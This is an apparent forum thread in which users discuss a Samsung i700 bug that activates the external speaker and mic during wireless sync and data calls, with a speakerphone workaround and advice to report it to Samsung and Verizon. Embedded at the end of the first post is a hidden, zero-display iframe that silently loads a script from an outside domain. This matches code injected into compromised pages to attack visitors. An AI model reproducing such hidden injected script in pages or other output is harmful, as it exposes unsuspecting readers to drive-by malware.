Wireless Sync Activates External Speaker

I may be going crazy but when I perform a wireless sync, I can hear my external speaker being activated. Has anyone else encountered this? If this is the case, would this be an additional and unnecessary drain on the battery?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Try this: Point Internet Explorer somewhere when you've got the headset plugged in and let it open a data call. When the phone connects to ANYTHING, even EN and QNC, it opens the mic and speaker.

DUH!

It's a bug!

It is indeed a bug for sure! Mine doesn't always do this, but it does most of the time. I find you can turn off the speaker by holding down the send key to activate the speakerphone then do i again to deactivate the speakerphone. Of course, this just puts the i700 in privacy mode and will mode and will kill any sound going to the big speaker, including MP3 playback and system sounds until the data connection ends.

Does Samsung know about this bug and do you have the URL at Samsung to report bugs? It would be invaluable to have this information distributed.

Samsung has a feedback section on its website. I would advise that you tell both Samsung and Verizon as Verizon would need to impliment the fix anyway.
